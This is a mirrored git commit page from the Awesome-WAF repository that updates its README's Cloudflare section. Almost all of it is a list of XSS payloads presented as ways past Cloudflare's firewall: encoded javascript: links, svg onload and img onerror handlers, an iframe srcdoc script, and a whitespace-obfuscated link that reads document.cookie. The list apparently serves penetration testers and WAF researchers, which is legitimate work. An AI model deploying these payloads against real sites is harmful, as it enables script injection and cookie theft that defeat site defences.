mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 23:13:28 +07:00
Updated with another bypass for Cloudflare
This commit is contained in:
parent
a38a71acdb
commit
08c1246990
13
README.md
13
README.md
@ -2998,23 +2998,26 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
|
||||
```
|
||||
|
||||
### Cloudflare
|
||||
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
|
||||
- [XSS Bypass](https://twitter.com/spyerror/status/1161432029319376897) by [@spyerror](https://twitter.com/spyerror)
|
||||
```
|
||||
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
|
||||
```
|
||||
- [XSS Bypass](https://pastebin.com/i8Ans4d4) by [@c0d3g33k](https://twitter.com/c0d3g33k)
|
||||
```
|
||||
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
|
||||
```
|
||||
- XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar)
|
||||
- [XSS Bypasses](https://twitter.com/h1_ragnar) by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar)
|
||||
```
|
||||
<svg onload=prompt%26%230000000040document.domain)>
|
||||
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
|
||||
1'"><img/src/onerror=.1|alert``>
|
||||
```
|
||||
- XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10)
|
||||
- [XSS Bypass](https://twitter.com/RakeshMane10/status/1109008686041759744) by [@RakeshMane10](https://twitter.com/rakeshmane10)
|
||||
```
|
||||
<svg/onload=alert()//
|
||||
```
|
||||
|
||||
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
|
||||
- [XSS Bypass](https://twitter.com/ArbazKiraak/status/1090654066986823680) by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
|
||||
```
|
||||
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
|
||||
```
|
||||
|
Loading…
Reference in New Issue
Block a user